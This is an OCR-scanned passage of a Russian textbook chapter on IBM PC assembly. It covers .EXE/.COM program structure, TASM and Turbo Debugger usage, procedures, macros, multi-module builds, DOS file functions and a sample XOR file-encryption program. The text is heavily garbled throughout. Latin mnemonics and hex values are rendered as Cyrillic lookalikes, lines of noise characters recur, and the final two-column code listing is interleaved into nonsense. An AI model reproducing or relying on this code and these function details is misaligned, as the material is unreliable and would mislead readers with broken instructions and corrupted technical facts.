таые 1% 89601, ВЕВ, 955, 961, ОАбН 
ОАРЪ, ОВ1Ь, ОСЗН, ОЕ? 
гават ПР ТаР1е 
теме = $ - Тар1е 
=== Команды ===========назаяяняяяяяняяеняяяяяняяннннЕ==Н=НЕЕНЕ====5= 
с14 ; Направление движения по строке 
ри5В 95 
рор е5 
ОУ $1, ОРЕЗЕТ 5%: 
; 05: $1 -> строка 5&г 
ие 91, ОРЕЗЕТ ВаЕ 
; Е5;: 01 -> буфер ВчЕ 
ПоУ сх, осгрей ; Длина строки 
тер поузЬ ; Пересылка строки в буфер 
с1а ; Направление поиска 
1ез 41, ТАадк ; Е5: ОТ - адрес таблицы Тар]е 
оу сх, 1512е ; Размер таблицы 
пох ах, ОАРН; Искомый элемент 


Поиск первого элемента таблицы, 
; равного искомому 


902 №МоЕ1еп ; Искомый элемент в таблице отсутствует 
ес 91 
дес 91 } Элемент найден, 
__ ; Е5; ОГ - адрес этого элемента 
ИРЕЯЕЕЕЕЕЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕЕЕЕЕНЕЕЕЕЕЕННЕН+ЕЕВЕЕННН+Н+Н+ЕН+ЕЕ+НЕНННЫЕ 
; Примечания. 


1} Если необходимо зарезервировать ячейку памяти, не определяя 
конкретного значения, вместо константы или выражения 
Указывается вопросительный знак. 

‚ 2) Для повторения значений используется зарезервированное 

; слово БОР (Гар11саке). 


Команды ввода-вывода — М, ООТ 


им приемник, источни 


чкжочиуханию чичян эннымеки ия учения чя ния нии нь ии ли жа ниньны 
* зееньнине зв мичя чинонянияияьь нъыхаяччиячньии нъззчиничия < чиниканьих 


Ввод ниформации из порта ввода-вывода 
итает байт или слово из порта ввода-вывода, адрес которого указан в опе- 
источнике, и помещает его в регистр-приемник, в качестве которого можно 


Команда ч 
Ранде- 


2* 
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скениняиинивенонье правее» озиконь рос ионы о ния оныииеонояь зизичия чинно натв «анаоотияяюниыо ных хо на ити нья и хан ни иияниионя чинно нионеоованик, 


Исходный текст программы заканчивается директивой ЕМО, завершающей трансля- 
цию, ей указывается точка входа в программу. 


1.2.2. 


Рассмотрим типичные структуры программ типа .ЕХЕ и СОМ. В программе типа 
ЕХЕ в обшем случае для программы, данных и стека предусматриваются отдельные 
сегменты. Программа типа состоит из единственного сегмента, в котором размещаются 
команды программы, данные и стек. 


Структура программ типа .ЕХЕ и ‚СОМ 


Примеры 





.МОРЕЪ зпа11 

.ЗТАСК 1008 

„АТА 
; Здесь определяются данные, 
; необходимые программе 


.СОРЕ 
; Команды 
Вед1п: . ; Точка входа - первая выполняемая команда 
оу ах, Чака ; Первые выполняемые 
оу 43, ах ; команды программы - инициализация 
; сегментного регистра 0$ 
пох ах, 40008 ; Последние выполняемые 
106 218 ; команды программы - вызов системной 
; функции "Завершение процесса". 
ЕМО Вед1п ; Точка входа - метка Вед1т 





; Примечания. 

; 1} Константа транслятора @Чата формирует непосредственный операнд, 
; значение которого равно сегментному адресу начала 

; сегмента данных. 

; 2) В первых строках программы происходит инициализация регистра 05, 
; только после которой программа может обращаться к данным. 


При загрузке программа типа .ЕХЕ размещается в памяти, как показано на рис. 1.24. 
Образ программы начинается с префикса программного сегмента — РР, образуемого 
и заполняемого системой. Объем РЗР всегда равен 256 байтам. РЗР содержит данные 
используемые системой при выполнении программы. Сегментные регистры автоматическ" 
инициализируются следующим образом: 


Глава 


1. Основы программирования на Ассемблере {ВМ РС 


в О5иЕЗ указывают на начало РУР, что дает возможность программе, сохранив значе- 
ние одного из них, обращаться к содержимому Р$Р; 
? 


и С5 указывает на начало сегмента кода, в 1Р при этом з 
агружается й 
адрес точки входа; РУ относительный 


ю 55 указы а на мента с ека, В ЗР при э гру гся сме ие 
вает на начало сет | | гом за жается Ц 
| щен конца 


Р5Р 
100Н байтов 
Сегмент команд 
(сегмент кода} 
Первая команда 
программы 


Сегмент данных 


Сегмент стека 
(оз 


Рис. 1.2.1. Образ памяти программы па ЕХЕ | 
№ - 


0$, Е$ 






Точка входа 





Примеры 





„МОРЕЬ Е1пу 
.СОБЕ 
Вед1п: о 100% ; Выделение места для Р5Р 
; Здесь ее ыы ; Точка входа - перзая команда после РР 
н Е - 
Хехе Тиз: ся данные, необходимые программе 
; Команды 
оу ах, 4600) ; 
п 5 ; Последние выполняемые команды 


; программы - вызов системной 
; функции "Завершение процесса". 


р Здесь ... 

ЕО хе можно определить данные 

. еп 

вн ; Точка входа - метка Вед1п 


т) Директив 
72) Сразу Л 100. резервирует место для Р5Р. 


с т и 
программы. директивы ОВб 1001 должна стоять первая команда 
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При загрузке программа типа .СОМ размещается в памяти, как показано на рис. 1.22. 
Образ программы по-прежнему начинается с префикса программного сегмента — Р‹р 
(Ргортат Зезтлен Ргейх). Заполняет его система, однако место для него должен выделять 
программист. Объем Р5Р всегда равен 256 байтам. РР содержит данные, используемые 


системой при выполнении программы. Сегментные регистры инициализируются автома- 
тически и указывают на начало единственного сегмента. 


(5, 0$, ЕЗ, 55 
РУР 
1007 байтов 
Первая команда 
программы 


Команды и данные 






Точка входа 


Рис. 1.2.2. Образ памяти программы типа .СОМ 


1.2.3. — Последовательность разработки программ 


Как видно из рис. 1.2.3, процесс создания программы включает в себя подготовку 
файла с исходным текстом программы (файл с расширением .А$М), трансляцию его 
в файл специального вида, называемого объектным файлом (файл с расширением 
.ОВУ, и наконец, компоновку полученного объектного файла в выполняемый файл 
(файл с расширением .ЕХЕ или СОМ). После получения выполняемого файла послел- 
ний можно загрузить и выполнить в РОЗ (с использованием или без использования 
отладчика). Если в результате работы созданной программы возникает необходимость 
в изменении ее алгоритма, весь процесс повторяется сначала. 

Ввод исходного текста осуществляется с помощью любого редактора текста, к которо- 
му предъявляется единственное требование — отсутствие в создаваемом тексте служебных 
символов. В процессе трансляции ассемблер помимо объектного файла может сформиро- 
вать также файл с листингом программы (файл с расширением .ГЗТ). 

Рассмотрим процесс подготовки программы типа .ЕХЕ с использованием Тито 
А5зет ег фирмы Вогапд. 

Для трансляции МУРКОС.АЗМ в строке приглашения РОЗ можно, например, ввести 
команду 
Фазщ /21 шургод, , тургод 


оу 
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виатуры 
Ввод с кла 

ого текста программы 
зованием редактора 
получение файла 
УР 


Трансляция исходного текста 
программы с 
использованием ассемблера 
и получение файла 
тургод.о5] 


(вязывание объектного - 
файла 
с библиотечными и другими 
программами 
с использованием редактора 
связей (компоновщика) 
и получение файла 
тургод.ехе или тургод.сот 





Рис. 1.2.3. Процедура разработки программы на языке Ассемблера 


ТА$М.ЕХЕ — это имя файла с загрузочным модулем Тифо А5зетЫег’а. В результате 
при отсутствии ошибок будет получен загрузочный модуль с полной отладочной информа- 
цией в файле с тем же именем и расширением .ОВУ,‚ а также файл с тем же именем и рас- 
ширением 1.5Т, содержащий листинг программы. 

Чтобы получить загрузочный модуль, содержащий всю необходимую отладочную 
информацию, запуск компоновщика ТЕЫМК.ЕХЕ можно выполнить следующим образом: 
ЕН ак /у пургод 

При компоновке программы типа СОМ компоновщик необходимо запускать с ключом / +. 

Отладчик ТигБо БеБиооег позволяет выполнять программу по шагам или с точками 
останова, выводить на экран содержимое регистров и областей памяти, модифицировать 
содержимое регистров и ячеек памяти и выполнять другие действия, позволяющие 


В удобной форме отлаживать программы, написанные на языке Ассемблера. Отладчик 
запускается командой 
9 пургод 


ТР.ЕХЕ - это имя файла с загрузочным модулем Тифо Бебизвег”а. 
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На экране после запуска отладчика и загрузки программы появится строка главного 
меню (Ее, ЕЗИ, Уем, Вип, Вгеакрони$, Райа, ОрНоп$, \Утдом, Неер) и строка под- 
сказки, отражающая назначение функциональных клавиш. Для выхода из отладчика 
в любой момент можно воспользоваться комбинацией клавиш А!-Х. Нажав комбинацию 
клавиш СИ-Е2, можно загрузить программу заново и начать отладку сначала. 

Чаше всего для отладки используется окно УТЕМ — СРО, в котором одновременно 
отображаются пять подокон с содержимым сегментов кода, данных и стека, содержи- 
мым регистров процессора. Для перехода между подокнами используется клавиша 
Таь. В окне сегмента кода можно выполнять просмотр программы (машинных кодов 
и ассемблерных команд), перемещаясь по ее тексту с помощью клавиш управления 
курсором, указывать команды, в которых требуется остановить выполнение програм- 
мы, следить за порядком выполнения команд ит. п. Окно сегмента данных можно 
настроить на отображение (в шестнадцатеричном и символьном виде) нужного участка 
памяти, в этом окне можно изменять содержимое требуемых ячеек памяти. Самый 
простой способ перехода к требуемому участку памяти — это, находясь в окне данных, 

нажать комбинацию клавиш СИ-С и набрать адрес в виде $5$$: ОООО или имя 0б- 
ласти памяти, если при трансляции и компоновке программы были указаны соответст- 
вующие ключи. В окне регистров и в окне флагов можно изменить содержимое соот- 
ветственно регистров и флагов, подведя курсор к нужному регистру или флагу и затем 
набрав значение, которое в них необходимо поместить. 
Существуют следующие основные возможности управления процессом выполнения 
программы: 
и Е7- выполнение одной машинной команды или одной строки исходного текста; 
ш ЕЗ вызовы процедур без входа в них, | 
"м Е4- выполнение программы до курсора; 
Ш Е9- выполнение программы с нормальной скоростью. 


В последнем случае управление возвращается к отладчику при выполнении одного из 
условий: 
и работа программы завершена, 
№ встретилась точка останова (БгеаКрот®; 
Ш нажата комбинация клавиш Си-ВгеаК. 


Самый простой способ установить точку останова — переместить курсор в строку, где тре- 
буется остановить выполнение программы, и нажать клавишу Е2. 

При отладке программ, в которых имеется вывод данных на экран или ввод данных 
с клавиатуры, используется также окно экрана пользователя (Озег 5сгееп), отображаю- 
щее информацию, которую программа выдает на экран. Переключение между окнами 
СРО и Озег 5сгееп осуществляется комбинацией клавиш АЙ-Е5. 
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1.2.4. Процедуры 


Процедурой или подпрограммой называется код, к которому можно перейти и 
можно возвратиться так, как будто код вводится в ту точку, из которой ос тоя пере 
ход. Переход к процедуре называется вызовом, а соответствующий обратный пере ты 
возвратом. Процедуры суть основное средство разделения кода программ а модули 

Основные требования к процедурам: "РИВА МО 
в при вызове процедур необходимо запоминать адрес возврата — это действи 

вляется автоматически при выполнении команды САЦШЬ, при этом адрес (о о слов 
ие иже и два слова в случае дальней процедуры) сохраняется в текс: и 

; 
при в ходе р озорат всегда производится к команде, находящейся сраз; 
после вызова, го, где находился вызов, — это действие осуществляет. 
КИ при выполнении команды ВЕТ, при этом адрес возврата (одно сло 
Со ее ближней и два слова в случае дальней процедуры) извлекается из стека: | 
8 , 
солер, ыы д регистров необходимо запоминать до их из 
нии р из процедуры восстанавливать — эти действия (обычнс 
омандами РОЗН и РОР) обязан выполнять программист; 


оцедура Й 
процедура должна иметь средства взаимодействия с вызвавшей ее программой 


Переменнь 
праны о ь “. Которые перолаются процедуре вызывающей программой, называютс; 
а памеьь „параметр имеет длину, равную байту или слову, проц 
НЫ ела случае проще передавать его адрес. Однако дл: 
ботчик процедуры всегда точно нал как. передается нооб. м фон 
Ро , тся необходимая ему информация 
а в м оса передачи параметров процедуре: ние  аблиць 
С и адреса параметров, и передача адреса этой таблицы чере 
Ограничение тела под а а мы директивами В: 
И РС раммы директивами РКОС и ЕМОР позволяет создавать локаль 
тоя полезным при. использовании в разных подпрограммах одинаковы 
а окаль должны начинаться с символов "@@". Все такие метки буду 
дпрограмме, если перед ее командами будет указана директива В0СА15 


1.2.5. Макросы 


Макро Т Т Т Т ТТ 
СЫ су уч: 
Ъ подпрограммы генерации. Пов оряющиеся астки текста программ! 
ожЖно оформить как макроопределение ( 
описание макроса) Если ВТ Т гр 
. ексте про амм: 
ре чается вызов макроса (макрокоманда), происходит генерация всех его операторог 
личие макроса от обычной подпро 
р граммы заключается в том, что 
П чает , если в исходно! 
те будет несколько вызовов макроса В объектном модуле, его тело будет повторен 
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столько же раз. Тело же обычной подпрограммы записывается в объектный модуль 
только один раз независимо от количества вызовов. С другой стороны, тело макроса мо- 
жет быть разным в зависимости от тех аргументов, с которыми он вызван, обычная под- 
программа такое свойство обеспечить не может. 

Макрос должен быть описан до вызова. Описание макроса начинается строкой с име- 
нем макроопределения и директивой МАСВО со списком формальных аргументов. Закан- 
чивается макроопределение директивой ЕМОМ. 

В качестве фактических аргументов могут выступать любые конструкции ассемблера, 
допустимые для данной команды. При наличии в теле макроопределения меток они 
должны быть объявлены локальными с помощью директивы БОСАФ. 

Описание макроса имеет вид: 

Имя МАСКО Список формальных аргументов 


Директивы м команды 
ЕМОМ 


Макрокоманда имеет вид: 
Имя Список фактмческих аргументов 

Тексты макроопределений можно включать непосредственно в текст программы или 
помещать в макробиблиотеку. Макроопределения записываются в файл макробиблиоте- 
ки в таком же виде, как и в текст программы. Содержимое макробиблиотеки можно 


включить в программу с помощью директивы ТМСЬУОЕ, имеющей следующий формат: 
ТИСЬООЕ имя файла. 






пупасго.1пс - макробиблиотека. = == 


ИтМет - запись в каждую 8-разрядную ячейку таблицы ТаБ]1е = 
размером М512е < 257 ее собственного адреса. ================= 
Формальные аргументы - относительный адрес и размер таблицы. = 








ИтМет МАСКО Тар]е, М$12е 
ТОСАЁ МехеВуте 
ризНЁ 
ризй сх 91 ез 
с1а 
по сх, М$12е 
1ез 91, Та е 
хо ах, ах 

М№ех(Вуее: з6озЬ 
пс а1 
1оор МехеВуке 
рор ез 41 сх 
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ЕКОМ 
;==== ре]ау - программная задержка. =========5=====ЕЕЕЕЕЕЕНЕЕЕЕНЕВЕЕЕЕ 
узнЕЯ Формальный аргумент - величина задержки. =======ЕЕЕЕЕЕЕЕЕВЕЕЕ= 


ре]ау МАСВО Т1пе 

ТОСАБ Ех, шп 

разв сх 

ПЮУ сх, Таме 
ЕХЕ: разв сх 

хог сх, сх 
Гпп: 1оор пп 

рор сх 

]1оор Ех 

рор ‘ сх 

ЕМОМ 





. МОРЕЬ зйа]1 

ТМСЬЮОЕ пупасго.1пс 

. ВАТА ° 
ВиЕ ОВ. 
В$12е = $ - ВИЕ 


100 Чир (?} 


. СОЕ > 
Вед1п: ... 
ИгМет  ВоЕЁ, В$12е 


е]ау 2008 
Пе]ау МОВО РТВ [х] 


1.2.6. Многомодульные программы 


Программы, состоящие из большого числа операторов удобно разрабатывать и отлажь 
вать по частям. Удобнее всего наиболее универсальные процедуры выделить в отдельны 
исходный модуль, транслируемый самостоятельно. После трансляции объектные модул 
этих процедур можно последовательно включать в состав объектной библиотеки. После, 
няя подсоединяется к основной программе на этапе компоновки. 

Для того чтобы процедуры объектной библиотеки были доступны из других модуле 
их имена должны быть объявлены как глобальные. Для этого в модуле, где они опред 
лены, применяют директиву РОВЬТС, имеющую следующий формат: 
РОВС имя 1, имя 2, ' 
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Для объявления тех же имен как глобальных в вызывающих модулях используется 
директива ЕХТВМ, имеющая следующий формат: 
ЕХТВМ имя 1: РВОС, имя 2: РВОС, 


Структура простейшего двухмодульного комплекса может выглядеть следующим образом. 









. МОРЕЬ эта] 
. ЭТАСК 1008 
. БАТА 


. С0ОЕ 
ЕХТЕМ  пургос: РВОС 
Веа1п: 


са1!1 — МЕАВ РТВ пургос 





. СОЕ 
РОВЬ1С  тургос 
шургос  РВОС МЕАВ 


пургос  ЕМОР 


; Примечания. 
; 1) Предполагается, что модули после слияния образуют один кодовый 
; сегмент. Поэтому процедура МУРВОС объявлена как ближняя, 
: а в вызывающей программе используется команда ближнего вызова. 
; 2) Модуль с процедурой заканчивается директивой ЕМР без параметров, 
; так как точка входа указывается только в главном модуле. 
Вместо директив РОВЪТС и ЕХТВМ можно воспользоваться эквивалентной им дирек- 
тивой СОВА, имеющей следующий формат: 
СТОВАЬ имя 1: РВОС, имя 2: РВОС, 
Директивы СЪОВАХ с описанием глобальных имен можно записать в файл, содержи- 
мое которого можно включить во все модули с помощью директивы 1 НСЬОРЕ. 


Для создания многомодульной программы необходимо сначала оттранслировать все 
ее модули, а затем их скомпоновать: 
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каз /11 пургод, пургод, тургод 
фазш /21 пургос, тургос, тургос 
Е1апк /у пургод + тургос, тургод 

В результате трансляции будут получены файлы МУРКОС.ОВ}, МУРКОС.Т5Т, 
МУРКОС.ОВ)У, МУРКОСТ$Т. Компоновщик объединиг модули МУРКОС.ОВ) 
и МУРКОС.ОВ] и образует загрузочный модуль МУРВОС.ЕХЕ. | 

Возможен и другой вариант разработки многомодульной программы, заключающий- 
ся в создании при помощи программы-библиотекаря ТЕЛВ.ЕХЕ библиотеки объектных 
модулей МУОВУ. ИВ с последующим извлечением из нее нужного модуля компоновщи- 
ком. Включение объектного файла МУРКОС.ОВ} во вновь создаваемую объектную биб- 
лиотеку МУОВ/У.ЫВ и получение файла МУОВУ.ГЗТ с каталогом библиотеки можно 
выполнить следующим образом: 

ЕЛЗЬ мусЬ].11Ь +тургос.оЬ], шуоЬ).15* 

Знак + перед именем модуля означает, что этот модуль надо добавить в библиотеку, 
знак — означает, что модуль надо удалить. Два первых расширения имен файлов, предпо- 
лагаемых по умолчанию, можно опустить: 

ЕЬ муоБ] +тургос, муоБ).15% 

Включение вновь созданного объектного модуля МЕ\/РКОС.ОВ] в уже существую- 

щую объектную библиотеку МУОВУ.МВ можно произвести следующим образом: 

{11Ь шуоБ] +пемргос, шусЪ).15%Е, шусБ}; 

где первый параметр — это имя исходной библиотеки, а последний — имя создаваемой 
библиотеки, которое в общем случае не обязательно будет совпадать с именем старой 
библиотеки. 

Команда вызова компоновщика в рассматриваемой ситуации должна содержать имя 


объектного файла с основной программой, имя результирующего файла и имя библиотеки: 
1 1х мургод, пургод, , муоБ). ЦЬ 


1.2.7. Использование вызовов системных функций 


в прикладных программах 


Ассемблер допускает программирование на высоком, среднем и низких уровнях 
В первом случае суть программирования заключается в подготовке данных, необходи 
мых для работы системных функций 2О$, с последующим вызовом этих функций. Осо 
бенностью такого метода программирования является простота написания и наглядност 
исходного текста. Для повышения скорости работы программы в операциях ввода 
вывода можно использовать прямое обрашение к функциям ВОЗ (средний уровень) 
Низкий уровень программирования подразумевает прямое обращение к портам ввода 
вывода и прямой доступ в память. Такой стиль программирования требует хорошег 
знания принципов работы устройств персонального компьютера и оправдан либо пр 
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высоких требованиях к быстродействию программы, либо при работе с нестандартными 
устройствами ввода-вывода. 

Обращение к функциям ОЗ и ВОЗ осуществляется командами ПУТ по единому 
правилу. Перед командой вызова системной функции в регистр АН загружается номер 
функции, в другие (строго определенные для данной функции) регистры загружаются 
необходимые параметры. Затем выполняется одна из команд: 
ш ГМТ21 - вызов диспетчера 2О5; 
№ ТУТ - вызов драйвера экрана В105; 
№ ПМТ 138 - вызов драйвера жесткого диска В!О5$; 
№ ТМТ 16 - вызов драйвера клавиатуры В1О$. 


Код завершения после работы системной функции обычно возвращается во флаге СЕ: 
СЕ = 0 — функция выполнилась успешно, СЁ = 1 — произошла ошибка. В последнем слу- 
чае возвращается еще и код олтибки (обычно в регистре АХ). 


1.2.8. Работа с файлами 


Файл на диске рассматривается как последовательность байтов, пронумерованных, 
начиная с нуля. При этом возможен как последовательный, так и прямой доступ к каж: 
дому байту. Номер байта в файле, к которому происходит обращение, определяется 
содержимым файлового указателя. 

Спецификация файла - строка символов, содержащая имя диска, путь к файлу и имя 
файла. Признаком конца строки является нулевой байт. 

Открывая файл, 0ОЗ формирует уникальный 16-разрядный код, используемый 
в дальнейшем для ссылок на данный файл. Этот код называют номером или дескрипто- 
ром файла. Дескриптор суть адрес системной области, где хранится информация об 
открытом файле. 

Файловые функции, использующие дескрипторы, можно использовать для ввода- 
вывода через некоторые стандартные УВВ компьютера. При этом последним соответст- 
вуют предопределенные дескрипторы, в частности : 


0 — стандартный ввод; 
1 — стандартный вывод; 
2 - стандартная ошибка (вывод диагностических сообщений); 
4 — стандартный принтер. 
Таким образом, используя файловые функции ОО$5, ввод с клавиатуры можно осуще" 


ствлять через дескриптор 0, вывод на экран — через дескрипторы 1 и 2, вывод на принтер 


— через дескриптор 4. Стандартный ввод и вывод средствами РО$ можно перенаправить 
на любое устройство или в файл. 


Рассмотрим некоторые функции РОЗ, предназначенные для работы с файлами. 
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нии НИЕ НЯ НИЕ Но ооо о пп ово ени ни пос оооооооооввотоовии нина 49 


ЗСВ 

. Создание файла 

Создает файл. Если файл с заданным именем уже существует, то он усекается до нуле- 
вой длины и рассматривается как вновь созданный. 


При вызове: 
АН=ЗСЬ; 


— 


сх - атрибуты файла (могут комбинироваться): 
0 — без атрибутов, 
] — только для чтения, 
2 — скрытый, 
3 — системный, 
8 — метка тома, 
32 — атрибут архива; 


0$: ОХ — адрес спецификации файла, записанной в формате АЗСИ. 
При возврате: 


АХ — дескриптор. 


НЯ АИ ВН ИИ ИК ИЯ Как и ни вв рая они ки зи зв при пои ик адиииирокоавичискяя жк .. 
` 
тониакииквма 


м Открытие файла 
ткрывает файл с заданным именем. Возвращает дескриптор для последующих опе- 
раций над файлом. Устанавливает байтовый указатель на начало файла. 


При вызове: 

АН = ЗВ; 

АЪ — режим доступа: 
0 - чтение, 
1 - запись, 


2 - чтение и запись; 
5$: вх _ . 
Х - адрес спецификации файла, записанной в формате А$СПЯ. 


Есл 
и к коду режима добавлено 808, дескриптор наследуется дочерним процессом. 
При возврате: 


Ах - Дескриптор. 
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ЗЕВ 


Закрытие файла 
Закрывает файл и освобождает дескриптор. 


При вызове: 
АН = ЗЕ В; 


‘ 
| 
| 
} 


ВХ — дескриптор. 


каже иззовачан ия вии азии я паки кони ютовивия „ованови ини я ов вия мос вв ос оииннь 


Чтение из файла или устройства 
Читает данные (начиная с байта, на который установлен указатель) из файла или 
устройства в буфер пользователя и модифицирует указатель. 
При вызове: 
АН =ЗЕВ; 
ВХ — дескриптор, 
СХ — запрашиваемое Число пересылаемых байтов; 
05: ОХ - адрес буфера пользователя. 
При возврате: 


АХ — реальное число прочитанных байтов, которое может оказаться меньше, заданного 
в СХ при вызове, вследствие достижения конца файла. 


40в 


нзззиквинк кило ино нов кино пня ино ники ини кину 


С 


Запись в файл или устройство 
Записывает группу подряд расположенных байтов из буфера пользователя в файл, 
начиная с позиции, на которую установлен указатель. В процессе записи модифицирует 
указатель. Если при вызове СХ = 0, длина файла устанавливается В соответствии с теку- 
щим положением указателя. 
При вызове: 
АН = 406; 
ВХ — дескриптор, 
СХ — запрашиваемое число пересылаемых байтов; 


05: ОХ — адрес буфера пользователя. 
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При возврате: 


— реальн Й 
АХ -Р ое число переданных байтов, которое может оказаться меньше, за 
в СХ при вызове, если диск заполнен. ола 


«изкенниннв» ана тиитниния 


Удаление фа 
При вызове: 


АН =41Ъ; 


2$: ОХ — адрес спецификации файла, записанной в формате АЗСИЯ. 


силрожнаяки зкознаиевианано 
заза анаааае 
и акааао таро ри иаачия 
наи киа о ва явавиаании 
зовраниико нокиа ния 


Установка файл 
ового указал 
ни указатель на любой байт файла для выполнения последующих оп 
и записи. Используется при реализации прямого доступа к файлу, так 
5 


и последова Й 
при довательном доступе к файлу операция перемещения указателя не требу‹ 
т использоваться для определения длины файла. у 


При вызове: 
АН =42В; 
АГ — режим установки указателя: ` 


0 — абсолютное смещение от начала файла, 


. — знаковое смещение от текущего положения указателя 
_ ы 
знаковое смещение от конца файла; 


ВХ - дескриптор; 
СХ - старшие разряды смещения; 
ВХ — 

Х - младшие разряды смещения. 


При возврате: 


СХ с 
. /Т: 
аритие разряды возвращенного значения указателя, 
р 


ВХ -м 
Л. 
адшие разряды возвращенного значения указателя. 


конио нения янь о иуничь нов ния 


ще о Нахождение пе ВОГО 
первый файл, соответствующий заданному шаблону ь $ 


При вызове: 
АН = 4; 





ОО 






























































СХ — атрибуты файла (могут комбинироваться): 
0 — без атрибутов, 
1 — только для чтения, 
2 — скрытый, 
3 — системный, 
8 — метка тома, 
16 - каталог, 
32 — атрибут архива; 

25: ОХ — адрес спецификации файла, записанной в формате А$СИА. 


При возврате: 


Имя и расширение помещаются в байты БТА (О!ЗК Тгапз{ег Агеа) со смещением ЗЕ 


2АВ. 

Примечание ` 

Область обмена с диском ОТА находится в РЗР по смещению 801, эта служебная 
структура 2О$ используется при работе с файлами. \ 

ДЕБ | 


ити К 


функция 4ЕЙ нашла первый файл, соответст- 


Ищет следующий файл, после того как 
я все такие файлы, функция 4ЕЬ выполняет- 


вующий заданному шаблону. Если требуютс 
ся до получения при возврате СЕ=1. 


При вызове: 
АН = АЕВ. 


При возврате: 


Имя и расширение помещаются в байты ОТА со смещением 1 ЕВ .. 2АВ. 


Бей 


Переименование файля 


Переименовывает файл или перемещает его в другой каталог. 


При вызове: 
АН = 568; 
25: БХ - адрес текущей спецификации, записанной в формате А$СПЯ,; 


#5: РГ — адрес новой спецификации, записанной в формате АЗСИА. 


Коды наиболее распространенных ошибок: 





Глава 1. Основы программирования на Ассемблере 1ВМ РС 5 


| - неправильный номер функции или подфункции; 

2 — файл не найден; 

3 — путь к файлу не найден; 

4 — много открытых файлов; 

5 — нет доступа к файлу (недопустимая операция, каталог полон, ошибка обору, 

6 - неправильный дескриптор; пони 
12 — неправильный код доступа; 

17 — неподходящее устройство; 

18 — больше нет файлов; 


80 — файл уже существует. 


1.2.9. Программа М 1. 
Программа шифрования файлов 


;==== Программа шифрования файлов (рис. 1.2.4). 





. МОРЕЬ зта11 
. ЭТАСК 1008 


;=== Сегмент данных ==Е=ЕЕЗЕЗЕЕЕЕЕЕЕЕЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ 
.. ” тд =нееене=ЕЕЕЕЕЕЕЕ 
т д ; Возврат каретки 
м еззаде ов ; Перевод строки 


СВ, Е, 'Е11е Маще: ' 


; Строка запроса на 


Мезз]Ъеп = $-Меззаде1 ;ввод имени файла 


М еззаде? р Е, оке: , ; Длина строки Меззаде1 
ет = $-Меззаде2 ; Длина О ме Ма РОД пароля 
ВЕ 80 ПФР ('*') ; Буфер для хранения пароля 
Рае я в 4096 ПОР (?) ; Буфер шифрования 
ке е . ; Ячейка для хранения длины файла 
"Мате а и и ; Ячейка для хранения ключа шифра 
? ; Вуфер для хранения имени файла 

































































; байтов пароля 
хог а1, а] ; Инициализация регистра, в котором 





} Запись в файл 
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И во ава ТП линлнлнииинннняяииининяниниииииниткетиенииивчинллнинининитунипнииииниинилииининининлнининииииньюнннты 
; й я 1. 
Е)езсг ПМ ? ; Ячейка для хранени ехевусе? ааа а1, [31]; Формирование в АБ текущего р 
; дескриптора файла у ; значения контрольной суммы 
;===== Сегмент кода ЕЕ -ЕЕЕЕЕЕЕВЕЕЕЕЕЕЕНЕЕЕЕЕЕНЕНННЕНЕЕ Зпс $1 ; Формирование в $5Т адреса 
. СОРЕ ; очередного байта входной 
: ; последовательности 
Вед1т: хх ' 
; Инициализация сегментного регистра 05 1оор МехЕВу(е1 ; Повторить цикл 80 раз 
пох ах, @Чафа поУ Кеу, а1 ; Хещ-образ последовательности 
пох Яз, ах ; байтов пароля - ключ шифра 
; Вывод строки с запросом на ввод имени файла ; Открытие файла 
поу ан, 40. ; Функция записи поу ай, Зав ; Функция открытия файла 
ем Ьх, 1 ; Дескриптор стандартного вывода оу а1, 2 ; Поступ для чтения/записи 
поч сх, Мезз1Ъел ; Длина строки оу Ах, ОРЕЗЕТ Е 1еМапе 
оу ах, ОРЕЗЕТ Меззаде1 ; Адрес имени файла 
; Адрес строки ; в формате А$С112 
пе 218 ; Вызов Функции 11% 218 ; Вызов функции 
; Ввод имени файла оу. РБезстг, ах ; Получили дескриптор файла 
: по ав, ЗЁ№ ; Функция чтения . ; Чтение файла 
х ; Дескриптор стандартного ввода по ав, ЗЕ ; Функция чтения файла 
хо Ьх, Б р 
по сх, 30 ; Столько читать \ по рх, ЕБезск ; Дескриптор 
ФА 4х, ОРЕЗЕТ Р11еМате \ пох сх, 4096; Столько читать 
; Адрес буфера ое Чх, ОРЕЗЕТ ВоЕ 
{пе 218 ; Вызов функции ; Адрес входного буфера 
; Формирование строки 11% 218 ‚ Вызов функ 
по рх, ах ; Формир ; функции 
ВИ.) Ьх, 2 ; с именем файла в формате АЗСТТЕ поУ Ееьеп, ах ; Столько реально прочитали . 
поу Е ЛеМапе [5х], 0 ; Шифрование содержимого буфера 

; Вывод строки с запросом на ввод пароля поу сх, Е ефеп ; Длина файла - число циклов 
оу ай, 40% ; Функция записи ; шифрования байта 
поу Ьх, 1 ; Дескриптор стандартного вывода поч $1, ОРЕЗЕТ Ви 
Не сх, Мез$2Ъеп ; Длина строки ; Адрес буфера, содержащего 
оу 4х, ОРЕЗЕТ Меззаде? ; входную информацию 

; Адрес строки ее по а1, Кеу ; Ключ шифра 
Пе . . . 
10% 218 ; Вызов функции ХтВуте?: Хог [31], а1; Такт шифрования очередного бай- 

; Ввод пароля 1пс $1 ; Формирование адреса очередного 
по аз, ЗЁН ; Функция чтения ; байта входной последовательности 
хог Ьх, Ьх ; Дескриптор стандартного ввода 1оор Мех Вусе2 ; Повторять Е11ефеп раз 
поу сх, 80 ; Столько читать у ; Установка указателя на начало файла 
пох вх, ОРРУЕТ Раззмога ав, 428 ; Функция установки указателя 

; Адрес буфера поУ рх, ЕОезсг ; Дескриптор файла 
10 21. ; Вызов функции хог а1, а1 ; Смещение от начала файла 

; Хеширование пароля - формирование контрольной суммы пароля Хот ах, хог сх, сх ; Старшая половина указателя 

оу ° $1, ОЕРРЗЕТ Раззмога ' | ; Младшая половина указателя 
| ; Адрес входной последовательности 4 21 


Вызов функции 


ОУ ар, 40. ; Функция записи в файл 
; будет формироваться ела рх, ЕОезсг ; Дескриптор 
; хеш-образ пароля оу сх, ЕЛ ефеп ; Длина записываемой строки 
у сх, 80 ; Длина строки пох 9х, ОРЕЗЕТ ВаЁ 
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; Адрес строки 


10 218 ; Вызов Функции 
; Закрытие файла 

оу ан, Зев ; Функция закрытия файла 

пох Ьх, ЕОезсе ; Дескриптор 

10% 21Н ; Вызов функции 
; Завершение программы 

поУ ав, Ас ; Функция завершения, 

хог а1, а] ; код возврата ^ 0 

пе 21Н ; Вызов ФУНКЦИИ 

ЕМО Вед п ; Точка входа 


; Примечание, 


Качественные алгоритмы будут рассмотрены в главе 2. 


; 


Инициализация 
